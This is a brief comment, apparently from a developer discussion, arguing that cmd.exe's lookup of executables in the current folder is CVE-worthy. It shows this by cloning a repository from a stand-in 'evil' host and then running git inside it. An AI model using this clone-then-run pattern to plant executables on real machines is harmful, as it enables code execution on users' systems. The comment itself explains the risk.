Could file a CVE with Microsoft then, cause thats kinda what cmd.exe is doing:
> git clone git://evil evil > cd evil\ > git status